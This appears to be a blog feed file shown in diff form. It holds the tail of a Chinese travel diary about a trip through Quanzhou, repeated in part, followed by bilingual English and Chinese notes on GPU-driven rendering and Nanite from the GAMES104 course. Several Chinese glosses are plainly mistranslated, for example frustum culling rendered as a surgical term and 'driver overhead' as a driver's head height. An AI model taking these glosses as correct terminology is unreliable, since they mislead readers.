    ​清源山是一座大山。泉州这天气湿热湿热的,一直爬山属实是有点不舒服,于是决定就看个老君岩吧。¥70 就看了个石雕,真奢侈啊真奢侈。

    老君岩
    老君岩
    老君岩

    老子天下第一!

    16:09 出发

    ​之后回民宿附近的广场解决广场问题。泉州人这么爱吃辣吗为什么那么多湘菜川菜馆。

    ​广场里找了家粤菜馆解决了。我还是喜欢广州的粤菜😭。

    古厝

    ​洗洗睡,下午见个亲戚,曾被评为泉州年度十佳阳光老人🐮!

    ​民宿南门往下看,清一色的自建小别墅啊。

    16:29 田安

    田安大桥

    ​再次过晋江,这回要去丰泽区了,应该是泉州最繁华的地方。

    16:52 温陵

    就一小吃街

    ​蕃客西来尽有奇珍惊海北

    ​晋人南渡曾携乡味过江东

    ​本来想吃个饭再去见亲戚的,但是好像也不咋想吃东西,看着这里店面也不是很卫生,就算了。

    17:00 探亲

    7.30

    07:20 出发

    该滚蛋了,小骑士!

    ​吃个早饭去车站。

    07:24 车站

    泉州站

    ​来到了美丽泉州站。这么大的车站竟然不通高铁!

    07:33 候车

    D3333

    ​来早了,改签一个早一点的车次。D3333 福州南-深圳北。连号,看上去非常吉利啊!

    07:45 上车

    再见泉州!

    08:21 下车

    直取大巴! 直取大巴! 直取大巴!

    直取大巴!

    ​按小红书介绍,下车右转有厦门北到航站楼 T3 的免费大巴!冲!

    09:08 集美

    跨海
    跨海

    跨海

    ​在泉州还是雾蒙蒙的,到厦门就蓝天白云了。

    09:23 候机

    候机
    候机
    候机

    候机

    ​这个时间来比去年人少了很多。打印登机牌-托运-安检-候机,一气呵成。

    12:05 起飞

    再见南方!

    ​林北要走了😭!

    12:07 金门

    对岸

    ​遥远的金门列岛。据说马上就开放福建户口前往金门旅游了!

    13:48 济南

    奔流到海不复回

    ​一阵飞,我只认识这个浑浊的黄河和一个三角形的水库,这便是山东济南了。

    ​过了黄河就是河北了。

    14:15 河北

    农田中的村庄

    ​窗外的景色让我想起了初中地理课说的“大散居 小聚居 交错杂居”(虽然指的不是这个)。

    ​虽然都是一片大平原,但是看上去杂乱无章的,这么看自己在《城市天际线》里搭的城市还不错。

    14:24 降落

    ROCK HOME TOWN

    ​要降落了!这次一路平稳,连气流颠簸都没有。

    14:43 冀石

    冀冀冀冀冀

    ​坐了几次飞机也都习惯了。每次去拿行李再出来都是一个路线。

    14:47 摆渡

    机场摆渡车

    ​上次坐大巴的体验实在是太差了!我不能接受,我选择高铁。虽然这样算上等待时间耗时更长。

    15:16 开等

    G1516

    ​我下象棋,一阵乱赢!

    16:17 京畿

    这个时间,就会逆光

    ​最后坐公交车一哆嗦了!

    16:48 冀大

    不!岁月太漫长了!我不想来日方长!

    ]]>
    + 前言

    该滚蛋了!

    ​暑假就要结束了!这回依旧打算从厦门飞。

    ​身为一个福建人从来没去过美丽泉州,我觉得不行!所以半道拐一下。

    正文

    7.28

    07:23 祥谦

    雾蒙蒙

    ​再见福州!要去河北了,居然还少见地刮起了雾霾,让我提前适应新生活,真是太感人了😭!

    07:45 福清

    大往服务区

    ​歇一歇。

    08:13 莆田

    双桥

    ​少见的斜拉桥和拱桥修得那么近。

    08:49 驿坂

    下高速了!

    ​进入泉州界!

    09:40 崇武

    崇武古城

    ​美丽泉州第一站——惠安崇武古城!

    ​在惠安一路上可以看到很多石雕,佛像啊石狮子之类的,体态庞大,看上去十分壮观,但是忘记拍照了😅。

    09:48 城外

    惠安女造型

    09:53 城内

    城内
    城内

    城内

    ​惠安崇武古城风景区,位于福建省泉州市惠安县崇武半岛东端,地处福建省东南沿海的突出部、泉州湾和湄州湾之间、惠安县境东南 24 千米的崇武半岛南端,濒临台湾海峡。崇武古城始建于明洪武二十年(1387 年)。

    ​虽是风景区,但好像并不完全是,大部分还是当地居民的居住之处。

    09:58 大海

    大海
    大海

    水天一色

    ​啊,大海,美丽的海,迷人的海~(这个排版样式看上去两张图融为一体了)

    10:03 大炮

    开炮!

    ​这个炮感觉就像个玩具……

    10:09 庙宇

    关帝庙
    关帝庙 关帝庙 关帝庙 关帝庙

    关帝庙

    ​注重传统礼仪的泉州人将庙宇修得金碧辉煌!

    ​后来才知道,寺庙内最好不要拍照,那还是不拍了。

    10:17 歌词

    爱拼才会赢!

    ​闽南网红金曲——《爱拼才会赢》!

            

    ​闽南人爱拼才会赢!闽东人赖了又吧唧😖。

    10:18 古厝

    古厝
    古厝

    石头房子

    ​一点点嵩口古镇的味道。

    10:28 城隍

    城隍庙 城隍庙 城隍庙 城隍庙

    城隍庙

    10:35 小街

    挂着灯笼

    ​一点点小时候的勺园里的味道。

    10:45 海潮

    海潮庵
    海潮庵 海潮庵 海潮庵 海潮庵

    海潮庵

    12:13 洛阳

    ​午饭就在崇武古城外面吃了碗贡丸汤,¥20。崇武特色小吃崇武鱼卷!我是不爱吃的。

    通向洛阳

    ​西晋末年中原战乱不止,大批汉人士族南渡入闽避乱,部分辗转来此,沿江尤选洛阳江万安渡口周围安居。唐初和唐末,中原地区两次大的战乱再次使中原士族大量南迁,洛阳镇成了中原汉人南迁避难的主要聚集地之一。中原士族南迁于此后,因思念家乡而以“洛阳”命名此地。

    ​啊!洛阳!代表了当时西晋末年胡搞瞎搞,可怜的老百姓们翻山越岭来到了泉州,为了思念故土,便取此地名为“洛阳”。

    12:19 晋江

    晋江大桥

    ​晋江市因西晋永嘉年间,中原百姓避战乱南迁,据江居住而得名。

    ​啊!晋江!代表了当时西晋末年胡搞瞎搞,可怜的老百姓们翻山越岭来到了泉州,为了思念故土,便取此地名为“晋江”。

    湖南简称湘,省会长沙有湘江;江西简称赣,省会南昌有赣江;福建简称闽,省会福州有闽江;山西简称晋,省会泉州有晋江。

    12:20 泰禾

    泉州之眼

    ​为什么摩天轮又叫 XX 之眼呢?

    16:10 民宿

    可爱的玩偶

    ​到民宿洗个澡,睡一觉,节奏慢一点,要走了好像也没啥心情特种兵了😭。

    ​民宿里这么大的玩具熊该如何清洗呢?

    16:13 窗外

    这就是东西塔!

    ​民宿的窗外可以直接看到烂怂塔耶!

    17:20 鲤城

    鲤城
    鲤城

    鲤城

    ​傍晚开车进鲤城,连个停车的地方都没有……

    17:47 西湖

    西湖公园
    西湖公园
    西湖公园

    西湖公园

    ​最后开到西湖公园才总算找到个地停车。

    18:03 小吃

    小吃店

    ​泉州人连店里都要摆一个灶台拜一拜耶。

    福州肉饼

    ​跟冀大里的闽南扒饭一样,属于是本地人听都没听说过的东西。

    闽南特色小吃

    ​点了一份烧肉粽和肉燕王。为什么要叫肉燕王呢?做法与肉燕不同,里面的肉馅是打成泥再充填地瓜粉的。好像没有普通肉燕好吃😇。

    闽南特色四果汤

    ​点了一份四果汤,感觉就像学校里的水果酸奶捞,酸奶换成了蜜水。

    18:53 夜晚

    晚上的鲤城 晚上的鲤城 晚上的鲤城 晚上的鲤城

    晚上的鲤城

    ​直接 citywork 进鲤城走一走吧,人从众𠈌。

    19:16 西街

    西街
    西街

    西街

    ​接下来就该逛一逛人气最火爆的福州三坊七巷泉州西街了。

    19:32 双塔

    双塔
    双塔

    泉州开元寺塔

    ​晚上泉州开元寺就关门了。旅行者,前面的区域,明天再来探索吧!

    19:37 挂件

    钥匙挂件

    ​打卡一下伟哥的 QQ 头像。

    19:48 归程

    晚间西湖

    ​古城里面有个类似师大小白的东西,坐上去西湖公园下,一人¥2。然后今日行程就差不多了。

    7.29

    06:35 清晨

    可爱的玩偶

    ​第二天的行程开始咯!

    07:34 超雄

    牛逼的电瓶车

    ​前往古城中……

    ​美丽泉州哥的电瓶车真是太厉害了!直接插在机动车道上,还闯红灯😅。

    ​而福州的电瓶车经过多年来的严打,状况确实好了不少,有点能感受到当时福州政府的举措还是有些正确性的。

    ​也可能是泉州这个地方没有地铁,所以政府对电瓶车就睁一只眼闭一只眼了,主打一个权衡之术。

    08:03 早餐

    面线糊

    ​考研那段时间挺喜欢吃师大桃李园的一家面线糊 + 片皮鸭的,来泉州必须得尝尝。

    ​往面线糊里加了油条、醋肉、虾还有卤蛋。油条、醋肉和卤蛋跟面线糊相性挺好的,虾在里面都有点烂了😅。

    08:29 开元

    这就是开元寺!

    ​开冲!

    开元寺 开元寺 开元寺 开元寺 开元寺 开元寺

    莲花道场

    ​开元寺位于福建省泉州市鲤城区西街,是中国东南沿海重要的文物古迹,也是福建省内规模最大的佛教寺院。该寺始创于唐初垂拱二年(686 年),初名莲花道场,开元二十六年(738 年)更名开元寺,是宋元时期泉州规模最大、官方地位最突出的佛教寺院。现存主要庙宇系明、清两代修建,南北长 260 米,东西宽 300 米,占地面积 78000 平方米。

    ​里面有着许多虔诚的信徒。

    08:52 茶花

    出水茶花

    ​大早上暴雨初停。

    08:56 弘一

    弘一法师纪念馆

    ​李叔同(1880 年 10 月 23 日—1942 年 10 月 13 日),又名李息霜、李岸、李良,谱名文涛,幼名成蹊,学名广侯,字息霜,别号漱筒。
    ​李叔同是著名音乐家、美术教育家、书法家、戏剧活动家,是中国话剧的开拓者之一。他从日本留学归国后,担任过教师、编辑之职,后剃度为僧,法名演音,号弘一,晚号晚晴老人,后被人尊称为弘一法师。
    ​1913 年受聘为浙江两级师范学校(后改为浙江省立第一师范学校)音乐、图画教师。1915 年起兼任南京高等师范学校音乐、图画教师,并谱曲南京大学历史上第一首校歌。1942 年 10 月 13 日,弘一法师圆寂于泉州不二祠温陵养老院晚晴室。

    ​啊!长亭外,古道边。大名鼎鼎的弘一法师于泉州圆寂。

    09:08 猫咪

    橘猫

    ​猫咪猫咪!

    09:10 杂项

    石狮子
    石狮子
    开元寺塔
    开元寺塔
    石狮子
    石狮子

    开元寺核心!

    杂项 杂项 杂项 杂项 杂项

    杂项

    10:19 清源

    清源山登山处

    ​接下来就该去逛逛清源山了。

    10:28 老君

    直扑老君岩!

    ​清源山是一座大山。泉州这天气湿热湿热的,一直爬山属实是有点不舒服,于是决定就看个老君岩吧。¥70 就看了个石雕,真奢侈啊真奢侈。

    老君岩
    老君岩
    老君岩

    老子天下第一!

    16:09 出发

    ​之后回民宿附近的广场解决广场问题。泉州人这么爱吃辣吗为什么那么多湘菜川菜馆。

    ​广场里找了家粤菜馆解决了。我还是喜欢广州的粤菜😭。

    古厝

    ​洗洗睡,下午见个亲戚,曾被评为泉州年度十佳阳光老人🐮!

    ​民宿南门往下看,清一色的自建小别墅啊。

    16:29 田安

    田安大桥

    ​再次过晋江,这回要去丰泽区了,应该是泉州最繁华的地方。

    16:52 温陵

    就一小吃街

    ​蕃客西来尽有奇珍惊海北

    ​晋人南渡曾携乡味过江东

    ​本来想吃个饭再去见亲戚的,但是好像也不咋想吃东西,看着这里店面也不是很卫生,就算了。

    17:00 探亲

    7.30

    07:20 出发

    该滚蛋了,小骑士!

    ​吃个早饭去车站。

    07:24 车站

    泉州站

    ​来到了美丽泉州站。这么大的车站竟然不通高铁!

    07:33 候车

    D3333

    ​来早了,改签一个早一点的车次。D3333 福州南-深圳北。连号,看上去非常吉利啊!

    07:45 上车

    再见泉州!

    08:21 下车

    直取大巴! 直取大巴! 直取大巴!

    直取大巴!

    ​按小红书介绍,下车右转有厦门北到航站楼 T3 的免费大巴!冲!

    09:08 集美

    跨海
    跨海

    跨海

    ​在泉州还是雾蒙蒙的,到厦门就蓝天白云了。

    09:23 候机

    候机
    候机
    候机

    候机

    ​这个时间来比去年人少了很多。打印登机牌-托运-安检-候机,一气呵成。

    12:05 起飞

    再见南方!

    ​林北要走了😭!

    12:07 金门

    对岸

    ​遥远的金门列岛。据说马上就开放福建户口前往金门旅游了!

    13:48 济南

    奔流到海不复回

    ​一阵飞,我只认识这个浑浊的黄河和一个三角形的水库,这便是山东济南了。

    ​过了黄河就是河北了。

    14:15 河北

    农田中的村庄

    ​窗外的景色让我想起了初中地理课说的“大散居 小聚居 交错杂居”(虽然指的不是这个)。

    ​虽然都是一片大平原,但是看上去杂乱无章的,这么看自己在《城市天际线》里搭的城市还不错。

    14:24 降落

    ROCK HOME TOWN

    ​要降落了!这次一路平稳,连气流颠簸都没有。

    14:43 冀石

    冀冀冀冀冀

    ​坐了几次飞机也都习惯了。每次去拿行李再出来都是一个路线。

    14:47 摆渡

    机场摆渡车

    ​上次坐大巴的体验实在是太差了!我不能接受,我选择高铁。虽然这样算上等待时间耗时更长。

    15:16 开等

    G1516

    ​我下象棋,一阵乱赢!

    16:17 京畿

    这个时间,就会逆光

    ​最后坐公交车一哆嗦了!

    16:48 冀大

    不!岁月太漫长了!我不想来日方长!

    ]]>
    @@ -798,7 +798,7 @@ /posts/GAMES104-GPU-Driven%20Geometry%20Pipeline-Nanite/ - 资源

    课程

    “Long” Pipeline of Traditional Rendering

    传统渲染的“长”管道

    • Compute unit works with graphics processor and rasterizer

      计算单元与图形处理器和光栅化器配合使用

    • It’s a series of data processing units arranged in a chain like manner

      它是一系列以链式方式排列的数据处理单元

    • Difficult to fully fill the GPU

      很难完全填满 GPU

    webp

    Jungle of Direct Draw Graphics API

    直接绘制图形的丛林 API

    Explosion of DrawCalls:

    DrawCalls 激增:

    • Meshes x RenderStates x LoDs x Materials x Animations

      网格 x 渲染状态 x LoD x 材质 x 动画

    webp

    Problem 1: A traditional DrawIndexedInstanced command requires 5 arguments assigned on CPU

    问题 1:传统的 DrawIndexed Instanced 命令需要在 CPU 上分配 5 个参数

    webp

    Problem 2: Driver state switching overhead between amount of draw commands

    问题 2:在绘制命令数量之间切换驱动程序状态的开销

    Bottleneck of Traditional Rendering Pipeline

    传统渲染管道的瓶颈

    webp

    When rendering complicated scene with dense geometries and many materials

    渲染具有密集几何体和许多材质的复杂场景时

    • High CPU overload

      CPU 过载严重

    • Frustum/Occlusion Culling

      颅骨/闭塞切除术

    • Prepare drawcall

      准备图纸

    • GPU idle time

      GPU 空闲时

    • CPU can not follow up GPU

      CPU 无法跟踪 GPU

    • High driver overhead

      驾驶员头顶高度

    • GPU state exchange overhead when solving large amount of drawcalls

      解决大量 drawcall 时的 GPU 状态交换开销

    Compute Shader - General Computation on GPU

    计算着色器-GPU 上的通用计算

    • High-speed general purpose computing and takes advantage of the large numbers of parallel processors on the GPU

      高速通用计算,并利用 GPU 上的大量并行处理器

    • Less overhead to graphics pipeline

      减少图形管道的开销

    • Just one stage in pipeline

      只是管道中的一个阶段

    webp

    Draw-Indirect Graphics API

    绘图-直接图形 API

    Advantage:

    优点:

    • Allow you to specify parameters to draw commands from a GPU buffer, or via GPU compute program

      允许您指定参数以从 GPU 缓冲区或通过 GPU 计算程序绘制命令

    • “Draw-Indirect” command can merge a lot of draw calls into one single draw call, even with different mesh topology

    “绘制间接”命令可以将许多绘制调用合并到一个绘制调用中,即使使用不同的网格拓扑

    Notice:

    注意:

    • The actual name of “Draw-Indirect” is different in each graphics platform, but they act as the same role. (e.g.
      vkCmdDrawIndexedIndirect(Vulkan), ExecuteIndirect(D3D12), …)

      “绘制间接”的实际名称在每个图形平台中都不同,但它们扮演着相同的角色。

    webp

    GPU Driven Render Pipeline – DrawPrimitive vs. DrawScene

    GPU 驱动的渲染管道——DrawPrimitive 与 DrawScene

    • GPU controls what objects are actually rendered

      GPU 控制实际渲染的对象

      • Lod selection, visibility culling on GPU

        Lod 选择,GPU 上的可见性剔除

    • No CPU/GPU roundtrip

      无 CPU/GPU 往返

      • CPU do not touch any GPU data

        CPU 不接触任何 GPU 数据

    • N viewports/frustums

      N 个视口/视锥

    Frees up the CPU to be used on other things, ie. AI

    释放 CPU 以用于其他事情

    webp

    GPU Driven Pipeline in Assassins Creed

    《刺客信条》中的 GPU 驱动流水线

    Motivation

    动机

    • Massive amounts of geometry: architecture, seamless interiors, crowds

      大量的几何形状:建筑、无缝的内部、人群

    Use mesh cluster rendering to

    使用网格簇渲染

    • Allow much more aggressive batching and culling granularity

      允许更严格的批处理和剔除粒度

    • Render different meshes efficiently with a single indirect draw command

      使用单个间接绘制命令高效渲染不同的网格

    webp

    Mesh Cluster Rendering

    网格簇渲染

    • Require

      需要

      • Fixed cluster topology (E.g. 64 triangles in Assassin Creed or 128 triangles in Nanite)

        固定集群拓扑(例如,刺客信条中的 64 个三角形或 Nanite 中的 128 个三角形)

      • Split & rearrange all meshes to fit fixed topology (insert degenerate triangles)

        拆分并重新排列所有网格以适应固定拓扑(插入退化三角形)

      • Fetch vertices manually in VS

        在 VS 中手动获取顶点

    • Key Implementation

      关键实施

      • Cull clusters by their bounding on GPU (usually by compute shader)

        通过 GPU 上的边界(通常通过计算着色器)剔除集群

      • GPU outputs culled cluster list & drawcall args

        GPU 输出精选集群列表和绘图调用参数

      • Draw arbitrary number of visible clusters in single drawcall

        在单个 drawcall 中绘制任意数量的可见簇

    webp

    GPU Driven Pipeline in Assassins Creed

    《刺客信条》中的 GPU 驱动流水线

    • Overview

      概述

      • Offload more work from CPU to GPU

        将更多工作从 CPU 转移到 GPU

      • But not perfectly “draw scene” command, can only draw objects with the same material together

        但不是完美的“绘制场景”命令,只能将具有相同材质的对象绘制在一起

    webp

    Works on CPU side

    webp

    在 CPU 端工作

    • Perform very coarse frustum culling and then batch all unculled objects together by material

      执行非常粗略的截头体剔除,然后按材质将所有未剔除的对象批处理在一起

      • CPU quad tree culling

        CPU 四叉树剔除

      • Drawcalls merged based on hash that build on noninstanced data:(e.g. material, renderstate, …).

        基于非实例化数据构建的哈希合并的绘图调用:(例如材质、渲染状态等)。

    • Update per instance data(e.g. transform, LOD factor…),static instances are persistent

      更新每个实例的数据(例如转换、LOD 因子等),静态实例是持久的

    GPU Instance Culling

    GPU 实例剔除

    • Output cluster chunks after instance culling

      实例剔除后输出集群块

    • Use the cluster chunk expansion (64 cluster in a chunk) to balance GPU threads within a wavefront.

      使用集群块扩展(一个块中有 64 个集群)来平衡波阵面内的 GPU 线程。

    webp

    GPU Cluster Culling

    GPU 集群剔除

    • Cluster culling by cluster bounding box

      通过聚类边界框进行聚类剔除

      • output cluster list

        输出集群列表

    • Triangle backface culling

      三角形背面剔除

      • output triangle visibility result and write offsets in new index buffer

    webp

    Index Buffer Compaction

    索引缓冲区压缩

    • Prepare a empty index buffer(8Mb) and per-assign space for each mesh instance

      为每个网格实例准备一个空的索引缓冲区(8Mb)和每个分配的空间

    • Parallel copy the visible triangles index into the new index buffer

      将可见三角形索引并行复制到新索引缓冲区中

    • Index buffer compaction and multi-draw rendering can be interleaved because of fixed size of new index buffer (8Mb)

      由于新索引缓冲区的大小固定(8Mb),索引缓冲区压缩和多绘制渲染可以交错进行

    webp

    Codec Triangle Visibility in Cube: Backface Culling

    立方体中的编解码器三角形可见性:背面消隐

    • Bake triangle visibility for pixel frustums of cluster centered cubemap

      簇中心立方体贴图像素平截头体的烘焙三角形可见性

    • Cubemap lookup based on camera

      基于相机的立方体贴图查找

    • Fetch 64 bits for visibility of all triangles in cluster

      获取 64 位以查看集群中所有三角形的可见性

    webp

    webp

    Occlusion Culling for Camera and Shadow

    相机和阴影的遮挡抑制

    Occlusion Depth Generation

    遮挡深度生成

    • Depth pre-pass with best occluders in full resolution

      全分辨率下使用最佳封堵器进行深度预处理

      • Choose best occluders by artist or heuristic (e.g. 300 occluders)

        按艺术家或启发式方法选择最佳封堵器(例如 300 个封堵器)

      • Holes can be from rejected occluder (bad occluder selection or alpha-tested geometry)

        孔可能来自被拒绝的封堵器(封堵器选择不当或阿尔法测试几何形状)

    • Downsampled best occluders depth to 512x256

      下采样最佳封堵器深度为 512x256

    • Then combined with reprojection of 1/16 low resolution version of last frame’s depth

      然后结合最后一帧深度的 1/16 低分辨率版本的重新投影

      • Last frame’s depth can helped to filled with holes.

        最后一帧的深度有助于填补孔洞。

      • False occlusion is possible from large moving objects in the last frame’s depth, but works in most cases.

        在最后一帧的深度中,大型移动对象可能会出现假遮挡,但在大多数情况下都是有效的。

    • Generate hierarchy-Z buffer for GPU culling

      生成用于 GPU 剔除的分层 Z-缓冲区

    webp

    Two-Phase Occlusion Culling

    两相闭塞消隐

    1st phase

    第一阶段

    Cull objects & clusters using last frame’s depth pyramid

    使用上一帧的深度金字塔剔除对象和簇

    Render visible objects

    渲染可见对象

    2nd phase

    第二阶段

    Refresh depth pyramid

    刷新深度金字塔

    Test culled objects & clusters

    测试剔除的物体和集群

    Render false negatives

    渲染假阴性

    webp

    Crazy Stressing Cases

    疯狂压力案例

    • “Torture” unit test scene 250,000separate moving objects

      “酷刑”单元测试场景 250000 个独立移动物体

    • 1GB of mesh data (10k+ meshes)

      1GB 网格数据(10k+ 网格)

    • 8k2 texture cache atlas

      8k2 纹理缓存图集

    • DirectX 11 code path

      DirectX 11 代码路径

    • 64 vertex clusters (strips)

      64 个顶点簇(条带)

    • No ExecuteIndirect / MultiDrawIndirect

      不执行间接/多画间接

    • Only two DrawInstancedIndirect calls

      只有两个 DrawInstancendirect 调用

    webp

    webp

    Fast Occlusion for Shadow

    快速遮挡阴影

    For each cascade

    对于每个级联

    • Generate camera depth reprojection (64x64 pixel)

      生成相机深度重投影(64x64 像素)

    • Then combine with last frame’s shadow depth reprojection

      然后结合上一帧的阴影深度重投影

    • Generate hierarchy-Z buffer for GPU culling

      生成用于 GPU 剔除的分层 Z-缓冲区

    webp

    Camera Depth Reprojection for Shadow Culling

    用于阴影消隐的相机深度重投影

    Motivation

    动机

    • It is essential to cull objects in light view, which does not cast a visible shadow

      在光线视角下剔除物体至关重要,因为光线视角不会投射出可见的阴影

    Implementation

    实施

    • Get camera visible areas that may appear shadow

      获取可能出现阴影的相机可见区域

    • For each 16*16screen tile, construct a cube (each yellow frustum) according to min/max depth in this tile.

      对于每个 16*16 的屏幕图块,根据该图块中的最小/最大深度构造一个立方体(每个黄色平截头体)。

    • Render max depth of these cubes in the light view

      在灯光视图中渲染这些立方体的最大深度

    • All objects that far from depth can be culled because they certainly do not contribute to visible shadow

      所有远离深度的物体都可以被剔除,因为它们肯定不会产生可见的阴影

    webp

    Best Cases of Camera Depth Reprojection

    相机深度重投影的最佳案例

    webp

    Visibility Buffer

    可见性缓冲区

    Recap - Deferred Shading, G-Buffer

    回顾-延迟着色,G-缓冲区

    • Forward rendering shades all fragments in triangle- submission order

      正向渲染为三角形中的所有片段着色-提交顺序

    • Wastes rendering power on pixels that don’t contribute to the final image

      在对最终图像没有贡献的像素上浪费渲染能力

    • Deferred shading solves this problem in 2steps:

      延迟着色通过两个步骤解决了这个问题:

    • First, surface attributes are stored in screen buffers -> G-Buffer

      首先,曲面属性存储在屏幕缓冲区 -> G-Buffer 中

    • Second, shading is computed for visible fragments only

      其次,仅对可见片段计算着色

    Deferred Shading

    延迟渲染

    webp

    Fat G-Buffer of Deferred Shading

    延迟遮光的 Fat G-Buffer

    • However, deferred shading increases memory bandwidth consumption:

      但是,延迟着色会增加内存带宽消耗:

      • Screen buffers for: normal, depth, albedo, material ID,…

        屏幕缓冲区用于:正常、深度、反照率、材质 ID,…

      • G-Buffer size becomes challenging at high resolutions

        G-缓冲区大小在高分辨率下变得具有挑战性

    webp

    Challenges of Complex Scene

    复杂场景的挑战

    webp

    webp

    Visibility Buffer - Filling

    可见性缓冲区-填充

    • Visibility Buffer generation step

      可见性缓冲区生成步骤

    • For each pixel in screen:

      对于屏幕中的每个像素:

      • Pack (alpha masked bit, drawID, primitiveID) into one 32-bit UINT

      • 将(alpha 掩码位、drawID、primitiveID)打包成一个 32 位的 UINT

      • Write that into a screen-sized buffer

        将其写入屏幕大小的缓冲区

    • The tuple (alpha masked bit, drawID, primitiveID) will allow a shader to access the triangle data in the shading step

      元组(alpha 掩码位、drawID、primitiveID)将允许着色器在着色步骤中访问三角形数据

    webp

    Visibility Buffer - Shading

    可见性缓冲区-着色

    • For each pixel in screen-space we do:

      对于屏幕空间中的每个像素,我们做:

    • Get drawID/triangleID at pixel pos

      在像素位置获取 drawID/trangleID

    • Load data for the 3 vertices from the VB

      从 VB 加载 3 个顶点的数据

    • Compute triangle gradients

      计算三角形梯度

    • Interpolate vertex attributes at pixel pos using gradients

      使用渐变在像素位置插值顶点属性

      • Attribs use w from position to compute perspective correct interpolation

        属性使用 w 从位置计算透视校正插值

      • MVP matrix is applied to position

        MVP 矩阵应用于定位

    • We have all data ready: shade and calculate final color

      我们已经准备好所有数据:阴影和计算最终颜色

    Pipeline of Visibility Buffer

    可见性缓冲管道

    webp

    Visibility Buffer + Deferred Shading

    可见性缓冲区+延迟着色

    webp

    Correct Texture Mipmap with Gradient Without

    无渐变的正确纹理 Mipmap

    webp

    Results

    Total

    • 8 Million Triangles
    • 5 Million Vertices

    webp

    Visibility Buffer

    GPU AMD RADEON R9 3801080p1440p2160p
    No MSAA8.5710.7215.19
    No MSAA – No Culling14.5215.8620.45
    2x MSAA11.4416.3825.87
    4x MSAA15.2720.8237.86

    Deferred Shading

    GPU AMD RADEON R9 3801080p1440p2160p
    No MSAA9.7512.3020.19
    No MSAA – No Culling14.1616.624.06
    2x MSAA16.1623.0942.68
    4x MSAA24.9036.3769.64

    Virtual Geometry - Nanite

    虚拟几何-Nanite

    Challenges of Realistic Rendering

    webp

    Nanite Overview

    Nanite 概述

    • Overview

      概述

    • Geometry Representation

      几何表示法

      • Cluster-based LoD

        基于集群的 LoD

      • BVH and runtime LoD

        BVH 和运行时间 LoD

    • Rendering

      渲染图

      • Software and Hardware Rasterization

        软件和硬件光栅化

      • Visibility Buffer

        可见性缓冲区

      • Deferred Materials

        递延材质

      • Tile-based Acceleration

        基于瓷砖的加速

    • Virtual Shadow Map

      虚拟阴影贴图

    • Streaming and Compression

      流媒体和压缩

    Virtual Texture

    虚拟纹理

    • Build a virtual indexed texture to represent all blended terrain materials for whole scene

      构建一个虚拟索引纹理,以表示整个场景的所有混合地形材质

    • Only load materials data of tiles based on view depend LOD

      仅加载基于视图的 LOD 的瓷砖材质数据

    • Pre-bake materials blending into tile and store them into physical textures

      预烘烤材质混合到瓷砖中,并将其储存成物理纹理

    webp

    The Dream

    理想

    • Virtualize geometry like we did textures

      像纹理一样虚拟化几何体

      • No more budgets

        没有更多预算

        • Poly count

          多边形计数

        • Draw calls

        • Memory

          记忆

    • Directly use film quality source art

      直接使用电影质量的源艺术

      • No manual optimization required

        无需手动优化

    • No loss in quality

      质量无损失

    Reality

    现实

    • MUCH harder than virtual texturing

      比虚拟纹理硬得多

      • Not just memory management

        不仅仅是内存管理

      • Geometry detail directly impacts rendering cost

        几何体细节直接影响渲染成本

      • Geometry is not trivially filterable (SDF, Voxels, Point Clouds)

        几何体不能轻易过滤(SDF、体素、点云)

    Voxels?

    体素?

    • Spatially uniform data distribution

      空间均匀的数据分布

    • Big memory consumption

      内存消耗大

    • Attribute leaking

      属性泄漏

    webp

    • Not interested in completely changing all CG workflow

      对完全改变所有 CG 工作流程不感兴趣

      • Support importing meshes authored anywhere

        支持导入在任何地方编写的网格

      • Still have UVs and tiling detail maps

        仍然有 UV 和平铺细节贴图

      • Only replacing meshes, not textures, not materials, not tools

        仅替换网格,不替换纹理,不替换材质,不替换工具

    • Never ending list of hard problems

      永无止境的难题清单

    Subdivision Surfaces?

    细分曲面?

    • Subdivision by definition is amplification only

      根据定义,细分只是放大

    • Great for up close but doesn’t get simpler than base mesh

      非常适合近距离拍摄,但不会比基础网眼更简单

    • Sometimes produces an excessive number of triangles

      有时会产生过多的三角形

    webp

    Maps-based Method?

    基于地图的方法?

    • Works well for organic surfaces that already are uniformly sampled

      适用于已经均匀取样的有机表面

    • Difficult to control hard surface features

      难以控制的硬表面特征

    • Sometimes object surface is not connected

      有时物体表面不连接

    webp

    Point Cloud?

    点云?

    • Massive amounts of overdraw

      大量透支

    • Requires hole filling

      需要补孔

    webp

    https://highperformancegraphics.org/slides22/Software_Rasterization_of_2_Billion_Points_in_Real_Time.pptx

    webp

    Foundation of Computer Graphics

    计算机图形学基础

    • The most elemental, atomic unit of surface area in 3D space

      三维空间中最基本的原子表面积单位

    • Every surface can be turned into triangles

      每个曲面都可以变成三角形

    webp

    Nanite Geometry Representation

    Nanite 几何表示法

    Screen Pixels and Triangles

    屏幕像素和三角形

    • Linear scaling in instances can be ok

      实例中的线性缩放是可以的

    • Linear scaling in triangles is not ok

      三角形中的线性缩放是不合适的

    Why should we draw more triangles than screen pixels?

    为什么我们应该绘制比屏幕像素更多的三角形?

    webp

    Represent Geometry by Clusters

    按簇表示几何体

    webp

    View Dependent LOD Transitions – Better than AC Solutions

    视图相关 LOD 转换——优于 AC 解决方案

    webp

    Similar Visual Apperance with 1/30 Rendering Cost!

    相似的视觉效果,渲染成本为 1/30!

    webp

    Naïve Solution - Cluster LoD Hierarchy

    幼稚的解决方案-集群 LoD 层次结构

    • Decide LOD on a cluster basis

      基于集群确定 LOD

    • Build a hierarchy of LODs

      构建 LOD 层次结构

      • Simplest is tree of clusters

        最简单的是集群树

      • Parents are the simplified versions of their children

        父母是孩子的简化版本

    webp

    Naïve Solution - Decide Cluster LOD Run-time

    天真的解决方案-确定集群 LOD 运行时间

    • Find cut of the tree for desired LOD

      找到所需 LOD 的树木切割

    • View dependent based on perceptual difference

      基于感知差异的视图依赖

    webp

    Naïve Solution – Simple Streaming Idea

    天真的解决方案——简单的流媒体创意

    • Entire tree doesn’t need to be in memory at once

      整个树不需要一次出现在内存中

    • Can mark any cut of the tree as leaves and toss the rest

      可以将树上的任何切口标记为叶子,然后扔掉剩下的

    • Request data on demand during rendering

      渲染过程中按需请求数据

      • Like virtual texturing

        类似于虚拟纹理

    webp

    But, How to Handle LOD Cracks

    但是,如何处理 LOD 裂缝

    • If each cluster decides LOD independent from neighbors, cracks!

      如果每个集群独立于邻居决定 LOD,那么就会破裂!

    • Naive solution:

      天真的解决方案:

      • Lock shared boundary edges during simplification

        在简化过程中锁定共享边界边

      • Independent clusters will always match at boundaries

        独立集群将始终在边界处匹配

    webp

    Locked Boundaries? Bad Results

    锁定边界?糟糕的结果

    • Collects dense cruft

      收集稠密的原油

